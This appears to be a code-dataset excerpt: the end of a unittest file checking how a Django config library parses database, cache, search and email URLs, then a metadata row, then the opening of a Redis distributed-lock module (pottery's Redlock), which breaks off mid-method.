self.assertEqual(url['NAME'], 'd8r82722r2kuvn')
self.assertEqual(url['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(url['USER'], 'uf07k1i6d8ia0v')
self.assertEqual(url['PASSWORD'], 'wegauwhgeuioweg')
self.assertEqual(url['PORT'], 5431)
def test_postgres_parsing_unix_domain_socket(self):
url = 'postgres:////var/run/postgresql/db'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], DJANGO_POSTGRES)
self.assertEqual(url['NAME'], 'db')
self.assertEqual(url['HOST'], '/var/run/postgresql')
def test_postgis_parsing(self):
url = 'postgis://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.contrib.gis.db.backends.postgis')
self.assertEqual(url['NAME'], 'd8r82722r2kuvn')
self.assertEqual(url['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(url['USER'], 'uf07k1i6d8ia0v')
self.assertEqual(url['PASSWORD'], 'wegauwhgeuioweg')
self.assertEqual(url['PORT'], 5431)
def test_mysql_gis_parsing(self):
url = 'mysqlgis://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.contrib.gis.db.backends.mysql')
self.assertEqual(url['NAME'], 'd8r82722r2kuvn')
self.assertEqual(url['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(url['USER'], 'uf07k1i6d8ia0v')
self.assertEqual(url['PASSWORD'], 'wegauwhgeuioweg')
self.assertEqual(url['PORT'], 5431)
def test_cleardb_parsing(self):
url = 'mysql://bea6eb025ca0d8:69772142@us-cdbr-east.cleardb.com/heroku_97681db3eff7580?reconnect=true'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.mysql')
self.assertEqual(url['NAME'], 'heroku_97681db3eff7580')
self.assertEqual(url['HOST'], 'us-cdbr-east.cleardb.com')
self.assertEqual(url['USER'], 'bea6eb025ca0d8')
self.assertEqual(url['PASSWORD'], '69772142')
self.assertEqual(url['PORT'], '')
def test_mysql_no_password(self):
url = 'mysql://travis@localhost/test_db'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.mysql')
self.assertEqual(url['NAME'], 'test_db')
self.assertEqual(url['HOST'], 'localhost')
self.assertEqual(url['USER'], 'travis')
self.assertEqual(url['PASSWORD'], '')
self.assertEqual(url['PORT'], '')
def test_empty_sqlite_url(self):
url = 'sqlite://'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(url['NAME'], ':memory:')
def test_memory_sqlite_url(self):
url = 'sqlite://:memory:'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(url['NAME'], ':memory:')
def test_memory_sqlite_url_warns_about_netloc(self):
url = 'sqlite://missing-slash-path'
with warnings.catch_warnings(record=True) as w:
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(url['NAME'], ':memory:')
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, UserWarning))
def test_database_options_parsing(self):
url = 'postgres://user:pass@host:1234/dbname?conn_max_age=600'
url = Env.db_url_config(url)
self.assertEqual(url['CONN_MAX_AGE'], 600)
url = 'postgres://user:pass@host:1234/dbname?conn_max_age=None&autocommit=True&atomic_requests=False'
url = Env.db_url_config(url)
self.assertEqual(url['CONN_MAX_AGE'], None)
self.assertEqual(url['AUTOCOMMIT'], True)
self.assertEqual(url['ATOMIC_REQUESTS'], False)
url = 'mysql://user:pass@host:1234/dbname?init_command=SET storage_engine=INNODB'
url = Env.db_url_config(url)
self.assertEqual(url['OPTIONS'], {
'init_command': 'SET storage_engine=INNODB',
})
def test_database_ldap_url(self):
url = 'ldap://cn=admin,dc=nodomain,dc=org:some_secret_password@ldap.nodomain.org/'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'ldapdb.backends.ldap')
self.assertEqual(url['HOST'], 'ldap.nodomain.org')
self.assertEqual(url['PORT'], '')
self.assertEqual(url['NAME'], 'ldap://ldap.nodomain.org')
self.assertEqual(url['USER'], 'cn=admin,dc=nodomain,dc=org')
self.assertEqual(url['PASSWORD'], 'some_secret_password')
class CacheTestSuite(unittest.TestCase):
def test_base_options_parsing(self):
url = 'memcache://127.0.0.1:11211/?timeout=0&key_prefix=cache_&key_function=foo.get_key&version=1'
url = Env.cache_url_config(url)
self.assertEqual(url['KEY_PREFIX'], 'cache_')
self.assertEqual(url['KEY_FUNCTION'], 'foo.get_key')
self.assertEqual(url['TIMEOUT'], 0)
self.assertEqual(url['VERSION'], 1)
url = 'redis://127.0.0.1:6379/?timeout=None'
url = Env.cache_url_config(url)
self.assertEqual(url['TIMEOUT'], None)
def test_memcache_parsing(self):
url = 'memcache://127.0.0.1:11211'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(url['LOCATION'], '127.0.0.1:11211')
def test_memcache_pylib_parsing(self):
url = 'pymemcache://127.0.0.1:11211'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.PyLibMCCache')
self.assertEqual(url['LOCATION'], '127.0.0.1:11211')
def test_memcache_multiple_parsing(self):
url = 'memcache://172.19.26.240:11211,172.19.26.242:11212'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(url['LOCATION'], ['172.19.26.240:11211', '172.19.26.242:11212'])
def test_memcache_socket_parsing(self):
url = 'memcache:///tmp/memcached.sock'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(url['LOCATION'], 'unix:/tmp/memcached.sock')
def test_dbcache_parsing(self):
url = 'dbcache://my_cache_table'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.db.DatabaseCache')
self.assertEqual(url['LOCATION'], 'my_cache_table')
def test_filecache_parsing(self):
url = 'filecache:///var/tmp/django_cache'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.filebased.FileBasedCache')
self.assertEqual(url['LOCATION'], '/var/tmp/django_cache')
def test_filecache_windows_parsing(self):
url = 'filecache://C:/foo/bar'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.filebased.FileBasedCache')
self.assertEqual(url['LOCATION'], 'C:/foo/bar')
def test_locmem_parsing(self):
url = 'locmemcache://'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.locmem.LocMemCache')
self.assertEqual(url['LOCATION'], '')
def test_locmem_named_parsing(self):
url = 'locmemcache://unique-snowflake'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.locmem.LocMemCache')
self.assertEqual(url['LOCATION'], 'unique-snowflake')
def test_dummycache_parsing(self):
url = 'dummycache://'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.dummy.DummyCache')
self.assertEqual(url['LOCATION'], '')
def test_redis_parsing(self):
url = 'rediscache://127.0.0.1:6379/1?client_class=django_redis.client.DefaultClient&password=secret'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], REDIS_DRIVER)
self.assertEqual(url['LOCATION'], 'redis://127.0.0.1:6379/1')
self.assertEqual(url['OPTIONS'], {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
'PASSWORD': 'secret',
})
def test_redis_socket_parsing(self):
url = 'rediscache:///path/to/socket:1'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django_redis.cache.RedisCache')
self.assertEqual(url['LOCATION'], 'unix:///path/to/socket:1')
def test_redis_with_password_parsing(self):
url = 'rediscache://:redispass@127.0.0.1:6379/0'
url = Env.cache_url_config(url)
self.assertEqual(REDIS_DRIVER, url['BACKEND'])
self.assertEqual(url['LOCATION'], 'redis://:redispass@127.0.0.1:6379/0')
def test_redis_multi_location_parsing(self):
url = 'rediscache://host1:6379,host2:6379,host3:9999/1'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], REDIS_DRIVER)
self.assertEqual(url['LOCATION'], [
'redis://host1:6379/1',
'redis://host2:6379/1',
'redis://host3:9999/1',
])
def test_redis_socket_url(self):
url = 'redis://:redispass@/path/to/socket.sock?db=0'
url = Env.cache_url_config(url)
self.assertEqual(REDIS_DRIVER, url['BACKEND'])
self.assertEqual(url['LOCATION'], 'unix://:redispass@/path/to/socket.sock')
self.assertEqual(url['OPTIONS'], {
'DB': 0
})
def test_rediss_parsing(self):
url = 'rediss://127.0.0.1:6379/1'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], REDIS_DRIVER)
self.assertEqual(url['LOCATION'], 'rediss://127.0.0.1:6379/1')
def test_options_parsing(self):
url = 'filecache:///var/tmp/django_cache?timeout=60&max_entries=1000&cull_frequency=0'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.filebased.FileBasedCache')
self.assertEqual(url['LOCATION'], '/var/tmp/django_cache')
self.assertEqual(url['TIMEOUT'], 60)
self.assertEqual(url['OPTIONS'], {
'MAX_ENTRIES': 1000,
'CULL_FREQUENCY': 0,
})
def test_custom_backend(self):
url = 'memcache://127.0.0.1:5400?foo=option&bars=9001'
backend = 'django_redis.cache.RedisCache'
url = Env.cache_url_config(url, backend)
self.assertEqual(url['BACKEND'], backend)
self.assertEqual(url['LOCATION'], '127.0.0.1:5400')
self.assertEqual(url['OPTIONS'], {
'FOO': 'option',
'BARS': 9001,
})
def test_unknown_backend(self):
url = 'unknown-scheme://127.0.0.1:1000'
with self.assertRaises(ImproperlyConfigured) as cm:
Env.cache_url_config(url)
self.assertEqual(str(cm.exception),
'Invalid cache schema unknown-scheme')
def test_empty_url_is_mapped_to_empty_config(self):
self.assertEqual(Env.cache_url_config(''), {})
self.assertEqual(Env.cache_url_config(None), {})
class SearchTestSuite(unittest.TestCase):
solr_url = 'solr://127.0.0.1:8983/solr'
elasticsearch_url = 'elasticsearch://127.0.0.1:9200/index'
whoosh_url = 'whoosh:///home/search/whoosh_index'
xapian_url = 'xapian:///home/search/xapian_index'
simple_url = 'simple:///'
def test_solr_parsing(self):
url = Env.search_url_config(self.solr_url)
self.assertEqual(url['ENGINE'], 'haystack.backends.solr_backend.SolrEngine')
self.assertEqual(url['URL'], 'http://127.0.0.1:8983/solr')
def test_solr_multicore_parsing(self):
timeout = 360
index = 'solr_index'
url = '{}/{}?TIMEOUT={}'.format(self.solr_url, index, timeout)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.solr_backend.SolrEngine')
self.assertEqual(url['URL'], 'http://127.0.0.1:8983/solr/solr_index')
self.assertEqual(url['TIMEOUT'], timeout)
self.assertTrue('INDEX_NAME' not in url)
self.assertTrue('PATH' not in url)
def test_elasticsearch_parsing(self):
timeout = 360
url = '{}?TIMEOUT={}'.format(self.elasticsearch_url, timeout)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine')
self.assertTrue('INDEX_NAME' in url.keys())
self.assertEqual(url['INDEX_NAME'], 'index')
self.assertTrue('TIMEOUT' in url.keys())
self.assertEqual(url['TIMEOUT'], timeout)
self.assertTrue('PATH' not in url)
def test_whoosh_parsing(self):
storage = 'file' # or ram
post_limit = 128 * 1024 * 1024
url = '{}?STORAGE={}&POST_LIMIT={}'.format(self.whoosh_url, storage, post_limit)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.whoosh_backend.WhooshEngine')
self.assertTrue('PATH' in url.keys())
self.assertEqual(url['PATH'], '/home/search/whoosh_index')
self.assertTrue('STORAGE' in url.keys())
self.assertEqual(url['STORAGE'], storage)
self.assertTrue('POST_LIMIT' in url.keys())
self.assertEqual(url['POST_LIMIT'], post_limit)
self.assertTrue('INDEX_NAME' not in url)
def test_xapian_parsing(self):
flags = 'myflags'
url = '{}?FLAGS={}'.format(self.xapian_url, flags)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.xapian_backend.XapianEngine')
self.assertTrue('PATH' in url.keys())
self.assertEqual(url['PATH'], '/home/search/xapian_index')
self.assertTrue('FLAGS' in url.keys())
self.assertEqual(url['FLAGS'], flags)
self.assertTrue('INDEX_NAME' not in url)
def test_simple_parsing(self):
url = Env.search_url_config(self.simple_url)
self.assertEqual(url['ENGINE'], 'haystack.backends.simple_backend.SimpleEngine')
self.assertTrue('INDEX_NAME' not in url)
self.assertTrue('PATH' not in url)
def test_common_args_parsing(self):
excluded_indexes = 'myapp.indexes.A,myapp.indexes.B'
include_spelling = 1
batch_size = 100
params = 'EXCLUDED_INDEXES={}&INCLUDE_SPELLING={}&BATCH_SIZE={}'.format(
excluded_indexes,
include_spelling,
batch_size
)
for url in [
self.solr_url,
self.elasticsearch_url,
self.whoosh_url,
self.xapian_url,
self.simple_url,
]:
url = '?'.join([url, params])
url = Env.search_url_config(url)
self.assertTrue('EXCLUDED_INDEXES' in url.keys())
self.assertTrue('myapp.indexes.A' in url['EXCLUDED_INDEXES'])
self.assertTrue('myapp.indexes.B' in url['EXCLUDED_INDEXES'])
self.assertTrue('INCLUDE_SPELLING'in url.keys())
self.assertTrue(url['INCLUDE_SPELLING'])
self.assertTrue('BATCH_SIZE' in url.keys())
self.assertEqual(url['BATCH_SIZE'], 100)
class EmailTests(unittest.TestCase):
def test_smtp_parsing(self):
url = 'smtps://user@domain.com:password@smtp.example.com:587'
url = Env.email_url_config(url)
self.assertEqual(url['EMAIL_BACKEND'], 'django.core.mail.backends.smtp.EmailBackend')
self.assertEqual(url['EMAIL_HOST'], 'smtp.example.com')
self.assertEqual(url['EMAIL_HOST_PASSWORD'], 'password')
self.assertEqual(url['EMAIL_HOST_USER'], 'user@domain.com')
self.assertEqual(url['EMAIL_PORT'], 587)
self.assertEqual(url['EMAIL_USE_TLS'], True)
class PathTests(unittest.TestCase):
def test_path_class(self):
root = Path(__file__, '..', is_file=True)
root_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))
self.assertEqual(root(), root_path)
self.assertEqual(root.__root__, root_path)
web = root.path('public')
self.assertEqual(web(), os.path.join(root_path, 'public'))
self.assertEqual(web('css'), os.path.join(root_path, 'public', 'css'))
def test_required_path(self):
self.assertRaises(ImproperlyConfigured, Path, '/not/existing/path/', required=True)
self.assertRaises(ImproperlyConfigured, Path(__file__), 'not_existing_path', required=True)
def test_comparison(self):
self.assertTrue(Path('/home') in Path('/'))
self.assertTrue(Path('/home') not in Path('/other/dir'))
self.assertTrue(Path('/home') == Path('/home'))
self.assertTrue(Path('/home') != Path('/home/dev'))
self.assertEqual(Path('/home/foo/').rfind('/'), str(Path('/home/foo')).rfind('/'))
self.assertEqual(Path('/home/foo/').find('/home'), str(Path('/home/foo/')).find('/home'))
self.assertEqual(Path('/home/foo/')[1], str(Path('/home/foo/'))[1])
self.assertEqual(Path('/home/foo/').__fspath__(), str(Path('/home/foo/')))
self.assertEqual(~Path('/home'), Path('/'))
self.assertEqual(Path('/') + 'home', Path('/home'))
self.assertEqual(Path('/') + '/home/public', Path('/home/public'))
self.assertEqual(Path('/home/dev/public') - 2, Path('/home'))
self.assertEqual(Path('/home/dev/public') - 'public', Path('/home/dev'))
self.assertRaises(TypeError, lambda _: Path('/home/dev/') - 'not int')
def load_suite():
test_suite = unittest.TestSuite()
cases = [
EnvTests, FileEnvTests, SubClassTests, SchemaEnvTests, PathTests,
DatabaseTestSuite, CacheTestSuite, EmailTests, SearchTestSuite
]
for case in cases:
test_suite.addTest(unittest.makeSuite(case))
return test_suite
if __name__ == "__main__":
try:
if sys.argv[1] == '-o':
for key, value in BaseTests.generateData().items():
print("{}={}".format(key, value))
sys.exit()
except IndexError:
pass
unittest.TextTestRunner().run(load_suite())
| 42.515306
| 124
| 0.644336
|
8097626df0018611c330c7e639defdf02c5cce45
| 26,863
|
py
|
Python
|
pottery/redlock.py
|
brainix/pottery
|
53897a8275400dc6a0c30b12fda9b57ad3037dbb
|
[
"Apache-2.0"
] | 625
|
2015-06-11T06:53:37.000Z
|
2022-03-29T16:30:08.000Z
|
pottery/redlock.py
|
brainix/pottery
|
53897a8275400dc6a0c30b12fda9b57ad3037dbb
|
[
"Apache-2.0"
] | 612
|
2015-06-12T05:39:32.000Z
|
2022-03-16T00:06:58.000Z
|
pottery/redlock.py
|
brainix/pottery
|
53897a8275400dc6a0c30b12fda9b57ad3037dbb
|
[
"Apache-2.0"
] | 30
|
2017-01-29T12:00:39.000Z
|
2022-03-13T11:39:49.000Z
|
# --------------------------------------------------------------------------- #
# redlock.py #
# #
# Copyright © 2015-2021, Rajiv Bakulesh Shah, original author. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at: #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# --------------------------------------------------------------------------- #
'''Distributed Redis-powered lock.
This algorithm safely and reliably provides a mutually-exclusive locking
primitive to protect a resource shared across threads, processes, and even
machines, without a single point of failure.
Rationale and algorithm description:
http://redis.io/topics/distlock
Reference implementations:
https://github.com/antirez/redlock-rb
https://github.com/SPSCommerce/redlock-py
Lua scripting:
https://github.com/andymccurdy/redis-py#lua-scripting
'''
import concurrent.futures
import contextlib
import functools
import logging
import math
import random
import time
import uuid
from types import TracebackType
from typing import Any
from typing import Callable
from typing import ClassVar
from typing import Iterable
from typing import Optional
from typing import Tuple
from typing import Type
from typing import cast
from typing import overload
from redis import Redis
from redis import RedisError
from redis.client import Script
from typing_extensions import Final
from typing_extensions import Literal
from .annotations import F
from .base import Primitive
from .exceptions import ExtendUnlockedLock
from .exceptions import QuorumNotAchieved
from .exceptions import ReleaseUnlockedLock
from .exceptions import TooManyExtensions
from .executor import BailOutExecutor
from .timer import ContextTimer
AUTO_RELEASE_TIME: Final[int] = 10 * 1000
_logger: Final[logging.Logger] = logging.getLogger('pottery')
class _Scripts:
'''Parent class to define/register Lua scripts for Redis.
Note that we only have to register these Lua scripts once -- so we do it on
the first instantiation of Redlock.
'''
__slots__: Tuple[str, ...] = tuple()
_acquired_script: ClassVar[Optional[Script]] = None
_extend_script: ClassVar[Optional[Script]] = None
_release_script: ClassVar[Optional[Script]] = None
def __init__(self,
*,
key: str,
masters: Iterable[Redis] = frozenset(),
raise_on_redis_errors: bool = False,
) -> None:
super().__init__( # type: ignore
key=key,
masters=masters,
raise_on_redis_errors=raise_on_redis_errors,
)
self.__register_acquired_script()
self.__register_extend_script()
self.__register_release_script()
# Preserve the Open-Closed Principle with name mangling.
# https://youtu.be/miGolgp9xq8?t=2086
# https://stackoverflow.com/a/38534939
def __register_acquired_script(self) -> None:
if self._acquired_script is None:
class_name = self.__class__.__qualname__
_logger.info('Registering %s._acquired_script', class_name)
master = next(iter(self.masters)) # type: ignore
self.__class__._acquired_script = master.register_script('''
if redis.call('get', KEYS[1]) == ARGV[1] then
local pttl = redis.call('pttl', KEYS[1])
return (pttl > 0) and pttl or 0
else
return 0
end
''')
def __register_extend_script(self) -> None:
if self._extend_script is None:
class_name = self.__class__.__qualname__
_logger.info('Registering %s._extend_script', class_name)
master = next(iter(self.masters)) # type: ignore
self.__class__._extend_script = master.register_script('''
if redis.call('get', KEYS[1]) == ARGV[1] then
return redis.call('pexpire', KEYS[1], ARGV[2])
else
return 0
end
''')
def __register_release_script(self) -> None:
if self._release_script is None:
class_name = self.__class__.__qualname__
_logger.info('Registering %s._release_script', class_name)
master = next(iter(self.masters)) # type: ignore
self.__class__._release_script = master.register_script('''
if redis.call('get', KEYS[1]) == ARGV[1] then
return redis.call('del', KEYS[1])
else
return 0
end
''')
class Redlock(_Scripts, Primitive):
'''Distributed Redis-powered lock.
This algorithm safely and reliably provides a mutually-exclusive locking
primitive to protect a resource shared across threads, processes, and even
machines, without a single point of failure.
Rationale and algorithm description:
http://redis.io/topics/distlock
Usage:
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock = Redlock(key='printer', masters={redis})
>>> bool(printer_lock.locked())
False
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> # Critical section - print stuff here.
>>> printer_lock.release()
>>> bool(printer_lock.locked())
False
Redlocks time out (by default, after 10 seconds). You should take care to
ensure that your critical section completes well within the timeout. The
reasons that Redlocks time out are to preserve "liveness"
(http://redis.io/topics/distlock#liveness-arguments) and to avoid deadlocks
(in the event that a process dies inside a critical section before it
releases its lock).
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> # Critical section - print stuff here.
>>> time.sleep(10)
>>> bool(printer_lock.locked())
False
If 10 seconds isn't enough to complete executing your critical section,
then you can specify your own timeout:
>>> printer_lock = Redlock(key='printer', masters={redis}, auto_release_time=15*1000)
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> # Critical section - print stuff here.
>>> time.sleep(10)
>>> bool(printer_lock.locked())
True
>>> time.sleep(5)
>>> bool(printer_lock.locked())
False
You can use a Redlock as a context manager:
>>> states = []
>>> with Redlock(key='printer', masters={redis}) as printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
>>> states = []
>>> with printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
'''
__slots__ = (
'auto_release_time',
'num_extensions',
'context_manager_blocking',
'context_manager_timeout',
'_uuid',
'_extension_num',
)
KEY_PREFIX: ClassVar[str] = 'redlock'
CLOCK_DRIFT_FACTOR: ClassVar[float] = 0.01
RETRY_DELAY: ClassVar[int] = 200
NUM_EXTENSIONS: ClassVar[int] = 3
def __init__(self,
*,
key: str,
masters: Iterable[Redis] = frozenset(),
raise_on_redis_errors: bool = False,
auto_release_time: int = AUTO_RELEASE_TIME,
num_extensions: int = NUM_EXTENSIONS,
context_manager_blocking: bool = True,
context_manager_timeout: float = -1,
) -> None:
if not context_manager_blocking and context_manager_timeout != -1:
raise ValueError("can't specify a timeout for a non-blocking call")
super().__init__(
key=key,
masters=masters,
raise_on_redis_errors=raise_on_redis_errors,
)
self.auto_release_time = auto_release_time
self.num_extensions = num_extensions
self.context_manager_blocking = context_manager_blocking
self.context_manager_timeout = context_manager_timeout
self._uuid = ''
self._extension_num = 0
def __acquire_master(self, master: Redis) -> bool:
acquired = master.set(
self.key,
self._uuid,
px=self.auto_release_time,
nx=True,
)
return bool(acquired)
def __acquired_master(self, master: Redis) -> int:
if self._uuid:
ttl: int = cast(Script, self._acquired_script)(
keys=(self.key,),
args=(self._uuid,),
client=master,
)
else:
ttl = 0
return ttl
def __extend_master(self, master: Redis) -> bool:
extended = cast(Script, self._extend_script)(
keys=(self.key,),
args=(self._uuid, self.auto_release_time),
client=master,
)
return bool(extended)
def __release_master(self, master: Redis) -> bool:
released = cast(Script, self._release_script)(
keys=(self.key,),
args=(self._uuid,),
client=master,
)
return bool(released)
def __drift(self) -> float:
return self.auto_release_time * self.CLOCK_DRIFT_FACTOR + 2
def __acquire_masters(self,
*,
raise_on_redis_errors: Optional[bool] = None,
) -> bool:
self._uuid = str(uuid.uuid4())
self._extension_num = 0
with ContextTimer() as timer, BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__acquire_master, master)
futures.add(future)
num_masters_acquired, redis_errors = 0, []
for future in concurrent.futures.as_completed(futures):
try:
num_masters_acquired += future.result()
except RedisError as error:
redis_errors.append(error)
_logger.exception(
'%s.__acquire_masters() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if num_masters_acquired > len(self.masters) // 2:
validity_time = self.auto_release_time
validity_time -= round(self.__drift())
validity_time -= timer.elapsed()
if validity_time > 0: # pragma: no cover
return True
with contextlib.suppress(ReleaseUnlockedLock):
self.__release(raise_on_redis_errors=False)
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
return False
def acquire(self,
*,
blocking: bool = True,
timeout: float = -1,
raise_on_redis_errors: Optional[bool] = None,
) -> bool:
'''Lock the lock.
If blocking is True and timeout is -1, then wait for as long as
necessary to acquire the lock. Return True.
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock_1 = Redlock(key='printer', masters={redis})
>>> printer_lock_1.acquire()
True
>>> timer = ContextTimer()
>>> timer.start()
>>> printer_lock_2 = Redlock(key='printer', masters={redis})
>>> printer_lock_2.acquire()
True
>>> 10 * 1000 < timer.elapsed() < 11 * 1000
True
>>> printer_lock_2.release()
If blocking is True and timeout is not -1, then wait for up to timeout
seconds to acquire the lock. Return True if the lock was acquired;
False if it wasn't.
>>> printer_lock_1.acquire()
True
>>> printer_lock_2.acquire(timeout=15)
True
>>> printer_lock_2.release()
>>> printer_lock_1.acquire()
True
>>> printer_lock_2.acquire(timeout=1)
False
>>> printer_lock_1.release()
If blocking is False and timeout is -1, then try just once right now to
acquire the lock. Return True if the lock was acquired; False if it
wasn't.
>>> printer_lock_1.acquire()
True
>>> printer_lock_2.acquire(blocking=False)
False
>>> printer_lock_1.release()
'''
acquire_masters = functools.partial(
self.__acquire_masters,
raise_on_redis_errors=raise_on_redis_errors,
)
def log_time_enqueued(timer: ContextTimer, acquired: bool) -> None:
key_suffix = self.key.split(':', maxsplit=1)[1]
time_enqueued = math.ceil(timer.elapsed())
_logger.info(
'source=pottery sample#redlock.enqueued.%s=%dms sample#redlock.acquired.%s=%d',
key_suffix,
time_enqueued,
key_suffix,
acquired,
)
if blocking:
enqueued = False
with ContextTimer() as timer:
while timeout == -1 or timer.elapsed() / 1000 < timeout:
if acquire_masters():
if enqueued:
log_time_enqueued(timer, True)
return True
enqueued = True
time.sleep(random.uniform(0, self.RETRY_DELAY/1000))
if enqueued:
log_time_enqueued(timer, False)
return False
if timeout == -1:
return acquire_masters()
raise ValueError("can't specify a timeout for a non-blocking call")
__acquire = acquire
def locked(self, *, raise_on_redis_errors: Optional[bool] = None) -> int:
'''How much longer we'll hold the lock (unless we extend or release it).
If we don't currently hold the lock, then this method returns 0.
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock_1 = Redlock(key='printer', masters={redis})
>>> printer_lock_1.locked()
0
>>> printer_lock_2 = Redlock(key='printer', masters={redis})
>>> printer_lock_2.acquire()
True
>>> printer_lock_1.locked()
0
>>> printer_lock_2.release()
If we do currently hold the lock, then this method returns the current
lease's Time To Live (TTL) in ms.
>>> printer_lock_1.acquire()
True
>>> 9 * 1000 < printer_lock_1.locked() < 10 * 1000
True
>>> printer_lock_1.release()
'''
with ContextTimer() as timer, BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__acquired_master, master)
futures.add(future)
ttls, redis_errors = [], []
for future in concurrent.futures.as_completed(futures):
try:
ttl = future.result()
except RedisError as error:
redis_errors.append(error)
_logger.exception(
'%s.locked() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if ttl:
ttls.append(ttl)
if len(ttls) > len(self.masters) // 2: # pragma: no cover
validity_time = min(ttls)
validity_time -= round(self.__drift())
validity_time -= timer.elapsed()
return max(validity_time, 0)
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
return 0
__locked = locked
def extend(self, *, raise_on_redis_errors: Optional[bool] = None) -> None:
'''Extend our hold on the lock (if we currently hold it).
Usage:
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock = Redlock(key='printer', masters={redis})
>>> printer_lock.acquire()
True
>>> 9 * 1000 < printer_lock.locked() < 10 * 1000
True
>>> time.sleep(1)
>>> 8 * 1000 < printer_lock.locked() < 9 * 1000
True
>>> printer_lock.extend()
>>> 9 * 1000 < printer_lock.locked() < 10 * 1000
True
>>> printer_lock.release()
'''
if self._extension_num >= self.num_extensions:
raise TooManyExtensions(self.key, self.masters)
with BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__extend_master, master)
futures.add(future)
num_masters_extended, redis_errors = 0, []
for future in concurrent.futures.as_completed(futures):
try:
num_masters_extended += future.result()
except RedisError as error:
redis_errors.append(error)
_logger.exception(
'%s.extend() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if num_masters_extended > len(self.masters) // 2:
self._extension_num += 1
return
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
raise ExtendUnlockedLock(
self.key,
self.masters,
redis_errors=redis_errors,
)
def release(self, *, raise_on_redis_errors: Optional[bool] = None) -> None:
'''Unlock the lock.
Usage:
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock = Redlock(key='printer', masters={redis})
>>> bool(printer_lock.locked())
False
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> printer_lock.release()
>>> bool(printer_lock.locked())
False
'''
with BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__release_master, master)
futures.add(future)
num_masters_released, redis_errors = 0, []
for future in concurrent.futures.as_completed(futures):
try:
num_masters_released += future.result()
except RedisError as error:
